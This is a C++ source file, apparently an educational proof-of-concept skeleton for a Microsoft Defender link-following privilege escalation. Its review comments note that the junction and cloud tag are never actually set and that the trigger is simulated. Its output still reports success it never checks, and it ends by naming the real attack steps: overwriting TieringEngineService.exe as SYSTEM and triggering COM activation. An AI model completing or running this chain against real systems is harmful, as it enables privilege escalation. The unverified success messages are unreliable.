/*
* CVE-2026-41091 - RedSun
* Microsoft Defender Link Following / Remediation Abuse
* Educational Proof of Concept (PoC) Skeleton
*
* Author: Ashraf Zaryouh "0xBlackash"
* Purpose: Educational & Research Only
* WARNING: For use only on systems you own and in isolated environments.
* Do NOT use for malicious purposes.
*/
#include <windows.h>
#include <iostream>
#include <string>
#include <filesystem>
#include <thread>
#include <chrono>
namespace fs = std::filesystem;
// Writes the fixed ASCII-art banner plus the demo title line to stdout and
// flushes the stream. The text is constant; no state is read or modified.
void PrintBanner() {
    static const char* const kBanner = R"(
_____ _ _____
| __ \ | | | __ \
| |__) |___ __| | | | | | ___ _ __ ___
| _ // _ \/ _` | | | | |/ _ \ '_ ` _ \
| | \ \ __/ (_| | | |__| | __/ | | | | |
|_| \_\___|\__,_| |_____/ \___|_| |_| |_|
CVE-2026-41091 RedSun - Defender LPE Concept
============================================
)";
    // '\n' followed by an explicit flush is what std::endl does.
    std::cout << kBanner << '\n' << std::flush;
}
// Creates (or truncates) an ordinary file at junctionPath and fills the first
// two fields of a REPARSE_DATA_BUFFER in a local buffer. That buffer is never
// handed to the file system, so no reparse point or junction comes into
// existence: the "[+] Created junction" line reports the intended outcome,
// not an observed one, and targetPath is only echoed into that message.
// Returns false only when CreateFileW itself fails; the handle is closed on
// the success path.
// NOTE(review): REPARSE_DATA_BUFFER is, as far as I can tell, not declared
// by <windows.h> (it comes from the driver-kit headers), so this TU may not
// build with the includes shown — confirm the build.
bool CreateJunction(const std::wstring& junctionPath, const std::wstring& targetPath) {
    const HANDLE handle = CreateFileW(junctionPath.c_str(), GENERIC_WRITE, 0, nullptr,
                                      CREATE_ALWAYS, FILE_FLAG_OPEN_REPARSE_POINT, nullptr);
    if (handle == INVALID_HANDLE_VALUE) {
        return false;
    }

    // Zero-initialised scratch space; only the tag and (empty) length are set.
    BYTE reparseStorage[1024] = {0};
    auto* reparse = reinterpret_cast<REPARSE_DATA_BUFFER*>(reparseStorage);
    reparse->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
    reparse->ReparseDataLength = 0;  // never submitted, see the header comment

    std::wcout << L"[+] Created junction: " << junctionPath << L" -> " << targetPath << std::endl;
    CloseHandle(handle);
    return true;
}
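// Writes a fixed marker string to filePath, creating or truncating the file.
// Despite the name, no cloud-file attribute or reparse point is applied: the
// file is created with FILE_ATTRIBUTE_NORMAL and only WriteFile is called, so
// the result is an ordinary file that nothing will treat as cloud-tagged.
// Returns true only when the whole payload was written. A failed or short
// WriteFile now closes the handle and returns false, where the original
// ignored the return value and reported success regardless.
bool PrepareCloudTaggedFile(const std::wstring& filePath) {
    const HANDLE handle = CreateFileW(filePath.c_str(), GENERIC_WRITE, 0, nullptr,
                                      CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, nullptr);
    if (handle == INVALID_HANDLE_VALUE) {
        return false;
    }

    // std::string carries the length, so no strlen()/<cstring> dependency;
    // the bytes written are identical to the original C string.
    const std::string payload = "RedSun Educational Payload - SYSTEM will rewrite this!";
    DWORD written = 0;
    const BOOL ok = WriteFile(handle, payload.data(), static_cast<DWORD>(payload.size()), &written, nullptr);
    // Close before deciding the result so the handle is released on every path.
    CloseHandle(handle);
    if (!ok || static_cast<size_t>(written) != payload.size()) {
        return false;
    }

    std::wcout << L"[+] Prepared cloud-tagged file: " << filePath << std::endl;
    return true;
}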
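// Entry point. Creates a scratch directory under the system temp path, drops
// the marker file and the (stub) "junction" file there, sleeps three seconds
// and prints a summary. Nothing here interacts with Defender or any other
// service: the "remediation trigger" is the sleep, and the artifacts are left
// in the temp directory for inspection.
// Returns 0 on completion, 1 if the directory or either artifact could not
// be created.
int main() {
    PrintBanner();

    // Join with path::operator/ instead of string concatenation: the original
    // relied on temp_directory_path() ending in a separator, which is not
    // guaranteed, and would otherwise produce "...\TempRedSun_PoC".
    const fs::path workDir = fs::temp_directory_path() / L"RedSun_PoC";
    const std::wstring tempDir = workDir.wstring();

    // A directory left over from an earlier run is acceptable; any other
    // failure is reported here rather than surfacing later as a misleading
    // "Failed to prepare file".
    if (!CreateDirectoryW(tempDir.c_str(), nullptr) && GetLastError() != ERROR_ALREADY_EXISTS) {
        std::cerr << "[-] Failed to create working directory" << std::endl;
        return 1;
    }

    const std::wstring maliciousFile = (workDir / L"malicious.cloud").wstring();
    const std::wstring junctionPath = (workDir / L"junction").wstring();

    std::cout << "[*] Starting RedSun educational demonstration..." << std::endl;
    if (!PrepareCloudTaggedFile(maliciousFile)) {
        std::cerr << "[-] Failed to prepare file" << std::endl;
        return 1;
    }
    if (!CreateJunction(junctionPath, L"C:\\Windows\\System32")) {
        std::cerr << "[-] Failed to create junction" << std::endl;
        return 1;
    }

    // No external event is awaited; this is a fixed delay only.
    std::cout << "[+] Waiting for Defender remediation trigger (simulated)..." << std::endl;
    std::this_thread::sleep_for(std::chrono::seconds(3));

    // The summary lines below describe a hypothetical outcome; nothing above
    // has produced one, and no file outside the scratch directory is touched.
    std::cout << "\n[+] Concept demonstration completed!" << std::endl;
    std::cout << "[i] In a full exploit, we would now have arbitrary write as SYSTEM." << std::endl;
    std::cout << "[i] Next steps (real exploit): Overwrite TieringEngineService.exe or similar + trigger COM activation." << std::endl;
    std::cout << "\n=== Educational PoC End ===\n" << std::endl;
    return 0;
}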